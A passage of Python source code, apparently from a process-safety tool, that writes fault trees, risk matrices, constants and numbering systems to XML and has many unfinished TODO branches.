info.ValueTag)\n\t\t\t\tMyXMLRoot_NumberSystem_Chunk_Value.text = pS(each_NumberSystem)\n\n\t\t\t#each_NumberSystem: core_classes.ParentNumberChunkItem\n\t\t\telif type(each_NumberSystem) == core_classes.ParentNumberChunkItem:\n\t\t\t\tMyXMLRoot_NumberSystem_Chunk_Type = ET.SubElement(MyXMLRoot_NumberSystem_Chunk, info.TypeTag)\n\t\t\t\tMyXMLRoot_NumberSystem_Chunk_Type.text = pS(info.NumberSystemParentType)\n\n\t\t\t\tMyXMLRoot_NumberSystem_Chunk_ID = ET.SubElement(MyXMLRoot_NumberSystem_Chunk, info.IDAttribName)\n\t\t\t\tMyXMLRoot_NumberSystem_Chunk_ID.text = pS(each_NumberSystem.Source)\n\n\t\t\t#each_NumberSystem: core_classes.SerialNumberChunkItem\n\t\t\telif type(each_NumberSystem) == core_classes.SerialNumberChunkItem:\n\t\t\t\tMyXMLRoot_NumberSystem_Chunk_Type = ET.SubElement(MyXMLRoot_NumberSystem_Chunk, info.TypeTag)\n\t\t\t\tMyXMLRoot_NumberSystem_Chunk_Type.text = pS(info.NumberSystemSerialType)\n\n\t\t\t\t#FieldWidth\n\t\t\t\tMyXMLRoot_NumberSystem_Chunk_FieldWidth = ET.SubElement(MyXMLRoot_NumberSystem_Chunk, info.FieldWidthTag)\n\t\t\t\tMyXMLRoot_NumberSystem_Chunk_FieldWidth.text = pS(str(each_NumberSystem.FieldWidth))\n\n\t\t\t\t#PadChar\n\t\t\t\tMyXMLRoot_NumberSystem_Chunk_PadChar = ET.SubElement(MyXMLRoot_NumberSystem_Chunk, info.PadCharTag)\n\t\t\t\tMyXMLRoot_NumberSystem_Chunk_PadChar.text = pS(str(each_NumberSystem.PadChar))\n\n\t\t\t\t#StartSequenceAt\n\t\t\t\tMyXMLRoot_NumberSystem_Chunk_StartSequenceAt = ET.SubElement(MyXMLRoot_NumberSystem_Chunk, info.StartSequenceAtTag)\n\t\t\t\tMyXMLRoot_NumberSystem_Chunk_StartSequenceAt.text = pS(str(each_NumberSystem.StartSequenceAt))\n\n\t\t\t\t#SkipTo\n\t\t\t\tif each_NumberSystem.SkipTo is not None:\n\t\t\t\t\tMyXMLRoot_NumberSystem_Chunk_SkipTo = ET.SubElement(MyXMLRoot_NumberSystem_Chunk, info.SkipToTag)\n\t\t\t\t\tMyXMLRoot_NumberSystem_Chunk_SkipTo.text = pS(str(each_NumberSystem.SkipTo))\n\n\t\t\t\t#GapBefore\n\t\t\t\tMyXMLRoot_NumberSystem_Chunk_GapBefore = ET.SubElement(MyXMLRoot_NumberSystem_Chunk, info.GapBeforeTag)\n\t\t\t\tMyXMLRoot_NumberSystem_Chunk_GapBefore.text = pS(str(each_NumberSystem.GapBefore))\n\n\t\t\t\t#IncludeInNumbering\n\t\t\t\tMyXMLRoot_NumberSystem_Chunk_IncludeInNumbering = ET.SubElement(MyXMLRoot_NumberSystem_Chunk, info.IncludeInNumberingTag)\n\t\t\t\tMyXMLRoot_NumberSystem_Chunk_IncludeInNumbering.text = pS(str(each_NumberSystem.IncludeInNumbering))\n\n\t\t\t\t#NoValue\n\t\t\t\tMyXMLRoot_NumberSystem_Chunk_NoValue = ET.SubElement(MyXMLRoot_NumberSystem_Chunk, info.NoValueTag)\n\t\t\t\tMyXMLRoot_NumberSystem_Chunk_NoValue.text = pS(each_NumberSystem.NoValue)\n\n\t\t\telse:\n\t\t\t\traise Exception('NumberSystem type incorrect.')\n\n\t# Risk Matrix\n\tif len(Proj.RiskMatrices) > 0:\n\n\t\t# LookupTableItem\n\t\tfor each_RiskMatrix in Proj.RiskMatrices:\n\t\t\tassert type(each_RiskMatrix) == core_classes.LookupTableItem\n\t\t\tMyXMLRoot_RiskMatrix = ET.SubElement(MyXMLRoot, info.RiskMatrixTag)\n\n\t\t\t# \n\t\t\t# Map to Keys\n\t\t\tif len(each_RiskMatrix.Keys) > 0:\n\t\t\t\teach_Category: core_classes.CategoryNameItem\n\t\t\t\t# TODO J: cannot map the object attribute which stores the list of categories\n\t\t\t\tfor each_Category in each_RiskMatrix.Value:\n\n\t\t\t\t\t#Category\n\t\t\t\t\tMyXMLRoot_RiskMatrix_Category = ET.SubElement(MyXMLRoot_RiskMatrix, info.CategoryTag)\n\n\t\t\t\t\t# ID\n\t\t\t\t\t# TODO J: cannot map Catergory ID\n\t\t\t\t\t\"\"\"\n\t\t\t\t\tMyXMLRoot_RiskMatrix_Category_ID = ET.SubElement(MyXMLRoot_RiskMatrix_Category, info.IDTag)\n\t\t\t\t\tMyXMLRoot_RiskMatrix_Category_ID.text = pS(each_Key.)\n\t\t\t\t\t\"\"\"\n\n\t\t\t\t\t# Name\n\t\t\t\t\tMyXMLRoot_RiskMatrix_Category_Name = ET.SubElement(MyXMLRoot_RiskMatrix_Category, info.NameTag)\n\t\t\t\t\tMyXMLRoot_RiskMatrix_Category_Name.text = pS(each_Category.HumanName)\n\n\t\t\t\t\t# Description\n\t\t\t\t\tMyXMLRoot_RiskMatrix_Category_Description = ET.SubElement(MyXMLRoot_RiskMatrix_Category,info.DescriptionTag)\n\t\t\t\t\tMyXMLRoot_RiskMatrix_Category_Description.text = pS(each_Category.HumanDescription)\n\t\t\t\t\tpass\n\n\t\t\t\tMyXMLRoot_RiskMatrix_SeverityDimensionIndex = ET.SubElement(MyXMLRoot_RiskMatrix, info.SeverityDimensionTag)\n\t\t\t\tMyXMLRoot_RiskMatrix_SeverityDimensionIndex.text = pS(str(each_RiskMatrix.SeverityDimensionIndex))\n\n\t\t\t\t# Dimension\n\t\t\t\teach_list_of_keys: core_classes.CategoryNameItem\n\t\t\t\tfor each_list_of_keys in each_RiskMatrix.Keys:\n\t\t\t\t\tfor inner_list in each_list_of_keys:\n\t\t\t\t\t\tMyXMLRoot_RiskMatrix_Dimension = ET.SubElement(MyXMLRoot_RiskMatrix, info.DimensionTag)\n\n\t\t\t\t\t\t# TODO J: what is the attribute\n\t\t\t\t\t\t\"\"\"\n\t\t\t\t\t\tMyXMLRoot_RiskMatrix_Dimension_Name = ET.SubElement(MyXMLRoot_RiskMatrix_Dimension, info.NameTag)\n\t\t\t\t\t\tMyXMLRoot_RiskMatrix_Dimension_Name.text = pS(inner_list.)\n\n\t\t\t\t\t\tMyXMLRoot_RiskMatrix_Dimension_Key = ET.SubElement(MyXMLRoot_RiskMatrix_Dimension, info.KeyTag)\n\t\t\t\t\t\tMyXMLRoot_RiskMatrix_Dimension_Key.text = pS(inner_list.)\n\t\t\t\t\t\t\"\"\"\n\t\t\t\t\t\t# ID\n\t\t\t\t\t\t# TODO J: cannot map Catergory ID\n\n\t\t\t\t# Value\n\t\t\t\tfor each_value in each_RiskMatrix.Value:\n\t\t\t\t\t#assert type(each_value) == core_classes.RiskReceptorItem\n\t\t\t\t\t# TODO how risk receptor contains a value? By which attribute?\n\n\t\t\t\t\tassert issubclass(type(each_value), core_classes.NumValueItem)\n\t\t\t\t\tMyXMLRoot_RiskMatrix_Entry = ET.SubElement(MyXMLRoot_RiskMatrix, info.EntryTag)\n\n\t\t\t\t\tif type(each_value) == core_classes.UserNumValueItem:\n\t\t\t\t\t\t# Kind\n\t\t\t\t\t\tMyXMLRoot_RiskMatrix_Entry_Kind = ET.SubElement(MyXMLRoot_RiskMatrix_Entry, info.KindTag)\n\n\t\t\t\t\t\t# RiskReceptor\n\t\t\t\t\t\tMyXMLRoot_RiskMatrix_Entry_RiskReceptor = ET.SubElement(MyXMLRoot_RiskMatrix_Entry, info.RiskReceptorTag)\n\t\t\t\t\t\tMyXMLRoot_RiskMatrix_Entry_RiskReceptor.text = None\n\n\n\t\t\t\t\t\tpass\n\t\t\t\t\telif type(each_value) == core_classes.ConstantItem:\n\n\t\t\t\t\t\tpass\n\t\t\t\t\telif type(each_value) == core_classes.LookupNumValueItem:\n\n\t\t\t\t\t\tpass\n\t\t\t\t\telif type(each_value) == core_classes.CategoryNameItem:\n\n\t\t\t\t\t\tpass\n\t\t\t\t\telif type(each_value) == core_classes.ParentNumValueItem:\n\n\t\t\t\t\t\tpass\n\n\n\t\t\t\t\tpass\n\n\t\t\t\tpass\n\t\t\tpass\n\t\tpass\n\n\t#Constants\n\t# J: TODO\n\tif len(Proj.Constants) > 0:\n\t\t# create outer XML tag\n\t\tMyXMLRoot_Constants = ET.SubElement(MyXMLRoot, info.ConstantsTag)\n\n\t\tfor each_Constant in Proj.Constants:\n\t\t\tassert type(each_Constant) == core_classes.ConstantItem\n\t\t\teach_Constant: core_classes.ConstantItem\n\t\t\tMyXMLRoot_Constants_Constant = ET.SubElement(MyXMLRoot_Constants, info.ConstantTag)\n\n\t\t\t#ID\n\t\t\tMyXMLRoot_Constants_Constant_Id = ET.SubElement(MyXMLRoot_Constants_Constant, info.IDTag)\n\t\t\tMyXMLRoot_Constants_Constant_Id.text = each_Constant.ID\n\n\t\t\t#Name\n\t\t\tMyXMLRoot_Constants_Constant_Name = ET.SubElement(MyXMLRoot_Constants_Constant, info.NameTag)\n\t\t\tMyXMLRoot_Constants_Constant_Name.text = each_Constant.HumanName\n\n\t\t\t#ConstValue\n\t\t\t#MyXMLRoot_Constants_Constant_ConstValue = ET.SubElement(MyXMLRoot_Constants_Constant, info.ConstValueTag)\n\t\t\t#MyXMLRoot_Constants_Constant_ConstValue.text = each_Constant.\n\n\n\t#FaultTree\n\tif len(Proj.FaultTree) > 0:\n\t\t# create outer XML tag\n\t\tMyXMLRoot_FaultTrees = ET.SubElement(MyXMLRoot, info.FaultTreesTag)\n\n\t\teach_FaultTree: faulttree.FTObjectInCore\n\t\tfor each_FaultTree in Proj.FaultTrees:\n\t\t\tassert type(each_FaultTree) == faulttree.FTObjectInCore\n\n\t\t\tMyXMLRoot_FaultTrees_FaultTree = ET.SubElement(MyXMLRoot_FaultTrees, info.FaultTreeTag)\n\n\t\t\t#ID\n\t\t\tMyXMLRoot_FaultTrees_FaultTree_Id = ET.SubElement(MyXMLRoot_FaultTrees_FaultTree, info.IDTag)\n\t\t\tMyXMLRoot_FaultTrees_FaultTree_Id.text = pS(str(each_FaultTree.ID))\n\n\t\t\t#SIFName\n\t\t\tMyXMLRoot_FaultTrees_FaultTree_SIFName = ET.SubElement(MyXMLRoot_FaultTrees_FaultTree, info.SIFNameTag)\n\t\t\tMyXMLRoot_FaultTrees_FaultTree_SIFName.text = pS(str(each_FaultTree.SIFName))\n\n\t\t\t#OpMode\n\t\t\tMyXMLRoot_FaultTrees_FaultTree_OpMode = ET.SubElement(MyXMLRoot_FaultTrees_FaultTree, info.OpModeTag)\n\t\t\tMyXMLRoot_FaultTrees_FaultTree_OpMode.text = pS(str(each_FaultTree.OpMode.XMLName))\n\n\t\t\t#Rev\n\t\t\tMyXMLRoot_FaultTrees_FaultTree_Rev = ET.SubElement(MyXMLRoot_FaultTrees_FaultTree, info.RevTag)\n\t\t\tMyXMLRoot_FaultTrees_FaultTree_Rev.text = pS(each_FaultTree.Rev)\n\n\t\t\t#TargetRiskRedMeasure\n\t\t\tMyXMLRoot_FaultTrees_FaultTree_TargetRiskRedMeasure = ET.SubElement(MyXMLRoot_FaultTrees_FaultTree, info.TargetRiskRedMeasureTag)\n\t\t\tMyXMLRoot_FaultTrees_FaultTree_TargetRiskRedMeasure.text = pS(each_FaultTree.TargetRiskRedMeasure)\n\n\t\t\t#SILTargetValue\n\t\t\tMyXMLRoot_FaultTrees_FaultTree_SILTargetValue = ET.SubElement(MyXMLRoot_FaultTrees_FaultTree, info.SILTargetValueTag)\n\t\t\tMyXMLRoot_FaultTrees_FaultTree_SILTargetValue.text = pS(each_FaultTree.SILTargetValue)\n\n\t\t\t#BackgColour\n\t\t\tMyXMLRoot_FaultTrees_FaultTree_BackgColour = ET.SubElement(MyXMLRoot_FaultTrees_FaultTree, info.BackgColour)\n\t\t\tMyXMLRoot_FaultTrees_FaultTree_BackgColour.text = pS(each_FaultTree.BackgColour)\n\n\t\t\t#TextColour\n\t\t\tMyXMLRoot_FaultTrees_FaultTree_TextColour = ET.SubElement(MyXMLRoot_FaultTrees_FaultTree, info.TextColour)\n\t\t\tMyXMLRoot_FaultTrees_FaultTree_TextColour.text = pS(each_FaultTree.TextColour)\n\n\t\t\t#Columns\n\t\t\tMyXMLRoot_FaultTrees_FaultTree_Columns = ET.SubElement(MyXMLRoot_FaultTrees_FaultTree, info.ColumnsTag)\n\n\t\t\teach_Column: FTColumnInCore\n\t\t\tfor each_Column in each_FaultTree.Columns:\n\t\t\t\t#Column\n\t\t\t\tMyXMLRoot_FaultTrees_FaultTree_Columns_Column = ET.SubElement(MyXMLRoot_FaultTrees_FaultTree_Columns,info.FTColumnTag)\n\n\t\t\t\tfor each_FTEvent in each_Column:\n\n\t\t\t\t\tif type(each_FTEvent) == faulttree.FTEventInCore:\n\t\t\t\t\t\t#FTEvent\n\t\t\t\t\t\tMyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTEvent = ET.SubElement(MyXMLRoot_FaultTrees_FaultTree_Columns_Column, info.FTEventTag)\n\n\t\t\t\t\t\t#ID\n\t\t\t\t\t\tMyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTEvent_ID = ET.SubElement(MyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTEvent, info.IDTag)\n\t\t\t\t\t\tMyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTEvent_ID.text = pS(str(each_FTEvent.ID))\n\n\t\t\t\t\t\t#IsIPL\n\t\t\t\t\t\tMyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTEvent_IsIPL = ET.SubElement(MyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTEvent, info.IsIPLTag)\n\t\t\t\t\t\tMyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTEvent_IsIPL.text = pS(str(each_FTEvent.IsIPL))\n\n\t\t\t\t\t\t#EventType\n\t\t\t\t\t\tMyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTEvent_EventType = ET.SubElement(MyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTEvent, info.EventTypeTag)\n\t\t\t\t\t\tMyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTEvent_EventType.text = pS(str(each_FTEvent.EventType))\n\n\t\t\t\t\t\t#NumberingID\n\t\t\t\t\t\t#TODO cannot map ID\n\t\t\t\t\t\tMyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTEvent_Numbering = ET.SubElement(MyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTEvent, info.NumberingTag)\n\t\t\t\t\t\tMyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTEvent_Numbering.text = pS(str(each_FTEvent.NumberingID))\n\n\t\t\t\t\t\t#EventDescription\n\t\t\t\t\t\tMyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTEvent_EventDescription = ET.SubElement(MyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTEvent, info.EventDescriptionTag)\n\t\t\t\t\t\tMyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTEvent_EventDescription.text = pS(str(each_FTEvent.EventDescription))\n\n\t\t\t\t\t\t#OldFreqValue\n\t\t\t\t\t\tMyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTEvent_OldFreqValue = ET.SubElement(MyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTEvent, info.OldFreqValueTag)\n\t\t\t\t\t\tMyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTEvent_OldFreqValue.text = pS(each_FTEvent.OldFreqValue.XMLName)\n\n\t\t\t\t\t\t#OldProbValue\n\t\t\t\t\t\tMyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTEvent_OldProbValue = ET.SubElement(MyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTEvent, info.OldProbValueTag)\n\t\t\t\t\t\tMyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTEvent_OldProbValue.text = pS(each_FTEvent.OldProbValue.XMLName)\n\n\t\t\t\t\t\teach_LastSelectedUnitPerQtyKind_Key: str\n\t\t\t\t\t\tfor each_LastSelectedUnitPerQtyKind_Key in each_FTEvent.LastSelectedUnitPerQtyKind:\n\t\t\t\t\t\t\t# LastSelectedUnit\n\t\t\t\t\t\t\tMyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTEvent_LastSelectedUnit = ET.SubElement(MyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTEvent, info.LastSelectedUnitTag)\n\n\t\t\t\t\t\t\t# QtyKind\n\t\t\t\t\t\t\tMyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTEvent_LastSelectedUnit_QtyKind = ET.SubElement(MyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTEvent_LastSelectedUnit, info.QtyKindTag)\n\t\t\t\t\t\t\tMyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTEvent_LastSelectedUnit_QtyKind.text = pS(str(each_FTEvent.LastSelectedUnitPerQtyKind))\n\n\t\t\t\t\t\t\t#Unit\n\t\t\t\t\t\t\tMyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTEvent_LastSelectedUnit_Unit = ET.SubElement(MyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTEvent_LastSelectedUnit, info.UnitTag)\n\t\t\t\t\t\t\tMyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTEvent_LastSelectedUnit_Unit.text = pS(str(each_FTEvent.LastSelectedUnitPerQtyKind.get(each_LastSelectedUnitPerQtyKind_Key)))\n\n\t\t\t\t\t\t#IsSIFFailureEventInRelevantOpmode\n\t\t\t\t\t\tMyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTEvent_IsSIFFailureEventInRelevantOpmode = ET.SubElement(MyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTEvent,info.IsSIFFailureEventInRelevantOpmodeTag)\n\t\t\t\t\t\tMyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTEvent_IsSIFFailureEventInRelevantOpmode.text = pS(str(each_FTEvent.IsSIFFailureEventInRelevantOpMode))\n\n\t\t\t\t\t\t#RiskReceptors\n\t\t\t\t\t\tif len(each_FTEvent.ApplicableRiskReceptors) > 0:\n\t\t\t\t\t\t\t'''\n\t\t\t\t\t\t\ttempRiskReceptorList = []\n\t\t\t\t\t\t\tfor each_RiskReceptor in each_FTEvent.ApplicableRiskReceptors:\n\t\t\t\t\t\t\t\ttempRiskReceptorList.append(each_RiskReceptor.ID)\n\t\t\t\t\t\t\t'''\n\t\t\t\t\t\t\tMyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTEvent_RiskReceptors = ET.SubElement(MyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTEvent, info.RiskReceptorsTag)\n\t\t\t\t\t\t\teach_RiskReceptor: core_classes.RiskReceptorItem\n\t\t\t\t\t\t\tMyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTEvent_RiskReceptors.text = pS(','.join(list(map(lambda each_RiskReceptor: each_RiskReceptor.ID, each_FTEvent.ApplicableRiskReceptors))))\n\n\t\t\t\t\t\t#BackgColour\n\t\t\t\t\t\tMyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTEvent_BackgColour = ET.SubElement(MyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTEvent, info.BackgColourTag)\n\t\t\t\t\t\tMyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTEvent_BackgColour.text = pS(str(each_FTEvent.BackgColour))\n\n\t\t\t\t\t\t#EventDescriptionComments\n\t\t\t\t\t\tif len(each_FTEvent.EventDescriptionComments) > 0:\n\t\t\t\t\t\t\tMyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTEvent_EventDescriptionComments = ET.SubElement(MyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTEvent, info.EventDescriptionCommentsTag)\n\t\t\t\t\t\t\t# J:since AssociatedTextItem does not have an ID, match core_classes.Comment instead\n\t\t\t\t\t\t\teach_EventDescriptionComment: core_classes.Comment\n\t\t\t\t\t\t\tMyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTEvent_EventDescriptionComments.text = pS(','.join(list(map(lambda each_EventDescriptionComment: each_EventDescriptionComment.ID, each_FTEvent.EventDescriptionComments))))\n\n\t\t\t\t\t\t#ValueComments\n\t\t\t\t\t\tif len(each_FTEvent.ValueComments) > 0:\n\t\t\t\t\t\t\tMyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTEvent_ValueComments = ET.SubElement(MyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTEvent, info.ValueCommentsTag)\n\t\t\t\t\t\t\t# J:since AssociatedTextItem does not have an ID, match core_classes.Comment instead\n\t\t\t\t\t\t\teach_ValueComment: core_classes.Comment\n\t\t\t\t\t\t\tMyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTEvent_ValueComments.text = pS(','.join(list(map(lambda each_ValueComment: each_ValueComment.ID, each_FTEvent.ValueComments))))\n\n\t\t\t\t\t\t#ShowDescriptionComments\n\t\t\t\t\t\tMyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTEvent_ShowDescriptionComments = ET.SubElement(MyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTEvent, info.ShowDescriptionCommentsTag)\n\t\t\t\t\t\tMyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTEvent_ShowDescriptionComments.text = pS(str(each_FTEvent.ShowValueComments))\n\n\t\t\t\t\t\t#ShowValueComments\n\t\t\t\t\t\tMyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTEvent_ShowValueComments = ET.SubElement(MyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTEvent, info.ShowValueCommentsTag)\n\t\t\t\t\t\tMyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTEvent_ShowValueComments.text = pS(str(each_FTEvent.ShowValueComments))\n\n\t\t\t\t\t\t#ConnectTo\n\t\t\t\t\t\tif len(each_FTEvent.ConnectTo) > 0:\n\t\t\t\t\t\t\tMyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTEvent_ConnectTo = ET.SubElement(MyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTEvent, info.ConnectToTag)\n\t\t\t\t\t\t\teach_FTEvent.ConnectTo: faulttree.FTEventInCore\n\t\t\t\t\t\t\tMyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTEvent_ConnectTo.text = pS(','.join(list(map(lambda each_FTEvent: each_FTEvent.ID, each_FTEvent.ConnectTo))))\n\n\t\t\t\t\t\t#LinkedFrom\n\t\t\t\t\t\t#TODO J: what is the type of LinkedFrom item?\n\t\t\t\t\t\tif len(each_FTEvent.LinkedFrom) > 0:\n\t\t\t\t\t\t\tMyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTEvent_LinkedFrom = ET.SubElement(MyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTEvent, info.LinkedFromTag)\n\t\t\t\t\t\t\teach_LinkedFromItem: faulttree.FTEventInCore.LinkedFrom\n\t\t\t\t\t\t\tMyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTEvent_LinkedFrom.text = pS(','.join(list(map(lambda each_FTEvent: each_FTEvent.ID, each_FTEvent.ConnectTo))))\n\n\t\t\t\t\tif type(each_FTEvent) == faulttree.FTGateItemInCore:\n\t\t\t\t\t\t#FTGate\n\n\t\t\t\t\t\tMyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTGate = ET.SubElement(MyXMLRoot_FaultTrees_FaultTree_Columns_Column, info.FTGateTag)\n\n\t\t\t\t\t\tMyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTGate_ID = ET.SubElement(MyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTGate, info.IDTag)\n\t\t\t\t\t\tMyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTGate_ID.text = pS(each_FTEvent.ID)\n\n\t\t\t\t\t\tMyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTGate_GateDescription = ET.SubElement(MyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTGate, info.GateDescriptionTag)\n\t\t\t\t\t\tMyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTGate_GateDescription.text = pS(str(each_FTEvent.GateDescription))\n\n\t\t\t\t\t\tMyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTGate_ShowDescriptionComments = ET.SubElement(MyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTGate, info.ShowDescriptionCommentsTag)\n\t\t\t\t\t\tMyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTGate_ShowDescriptionComments.text = pS(str(each_FTEvent.ShowDescriptionComments))\n\n\t\t\t\t\t\tif len(each_FTEvent.ActionItems) > 0:\n\t\t\t\t\t\t\tMyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTGate_ActionItems = ET.SubElement(MyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTGate, info.ActionItemsTag)\n\t\t\t\t\t\t\t# J:since AssociatedTextItem does not have an ID, match core_classes.Comment instead\n\t\t\t\t\t\t\teach_ActionItem: core_classes.Comment\n\t\t\t\t\t\t\tMyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTGate_ActionItems.text = pS(','.join(list(map(lambda each_ActionItem: each_ActionItem.ID, each_FTEvent.ActionItems))))\n\n\t\t\t\t\t\tMyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTGate_ShowActionItems = ET.SubElement(MyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTGate, info.ShowActionItemsTag)\n\t\t\t\t\t\tMyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTGate_ShowActionItems.text = pS(str(each_FTEvent.ShowActionItems))\n\n\t\t\t\t\tif type(each_FTEvent) == faulttree.FTConnectorItemInCore:\n\t\t\t\t\t\t#TODO J: In Out should be determined by flag Out: faulttree.FTConnectorItemInCore.Out?\n\n\t\t\t\t\t\teach_FTEvent: faulttree.FTConnectorItemInCore\n\t\t\t\t\t\tif (each_FTEvent.Out):\n\t\t\t\t\t\t\t# FTConnectorOut\n\t\t\t\t\t\t\tMyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTConnector = ET.SubElement(MyXMLRoot_FaultTrees_FaultTree_Columns_Column, info.FTConnectorOutTag)\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t# FTConnectorIn\n\t\t\t\t\t\t\tMyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTConnector = ET.SubElement(MyXMLRoot_FaultTrees_FaultTree_Columns_Column, info.FTConnectorInTag)\n\n\t\t\t\t\t\t# ID\n\t\t\t\t\t\tMyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTConnector_ID = ET.SubElement(MyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTConnector, info.IDTag)\n\t\t\t\t\t\tMyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTConnector_ID.text = pS(str(each_FTEvent.ID))\n\n\t\t\t\t\t\t# ConnectorDescription\n\t\t\t\t\t\tMyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTConnector_ConnectorDescription = ET.SubElement(MyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTConnector, info.ConnectorDescriptionTag)\n\t\t\t\t\t\tMyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTConnector_ConnectorDescription.text = pS(str(each_FTEvent.ConnectorDescription))\n\n\t\t\t\t\t\t# ConnectorDescriptionComments\n\t\t\t\t\t\tif len(each_FTEvent.ConnectorDescriptionComments) > 0:\n\t\t\t\t\t\t\tMyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTConnector_ConnectorDescriptionComments = ET.SubElement(MyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTConnector,info.ConnectorDescriptionCommentsTag)\n\t\t\t\t\t\t\t# J:since AssociatedTextItem does not have an ID, match core_classes.Comment instead\n\t\t\t\t\t\t\teach_ConnectorDescriptionComment: core_classes.Comment\n\t\t\t\t\t\t\tMyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTGate_ActionItems.text = pS(','.join(list(map(lambda each_ConnectorDescriptionComment: each_ConnectorDescriptionComment.ID,each_FTEvent.ConnectorDescriptionComments))))\n\n\t\t\t\t\t\tMyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTConnector_ShowDescriptionComments = ET.SubElement(MyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTConnector, info.ShowDescriptionCommentsTag)\n\t\t\t\t\t\tMyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTConnector_ShowDescriptionComments.text = pS(str(each_FTEvent.ShowDescriptionComments))\n\n\t\t\t\t\t\t# BackgColour\n\t\t\t\t\t\tMyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTConnector_BackgColour = ET.SubElement(MyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTConnector, info.BackgColourTag)\n\t\t\t\t\t\tMyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTConnector_BackgColour.text = pS(str(each_FTEvent.BackgColour))\n\n\t\t\t\t\t\tif(each_FTEvent.Out):\n\n\t\t\t\t\t\t\tpass\n\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t#RelatedConnector\n\t\t\t\t\t\t\tif each_FTEvent.RelatedCX is not None:\n\t\t\t\t\t\t\t\teach_FTEvent.RelatedCX: faulttree.FTConnectorItemInCore\n\t\t\t\t\t\t\t\tMyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTConnector_RelatedConnector = ET.SubElement(MyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTConnector, info.RelatedConnectorTag)\n\t\t\t\t\t\t\t\tMyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTConnector_RelatedConnector.text = 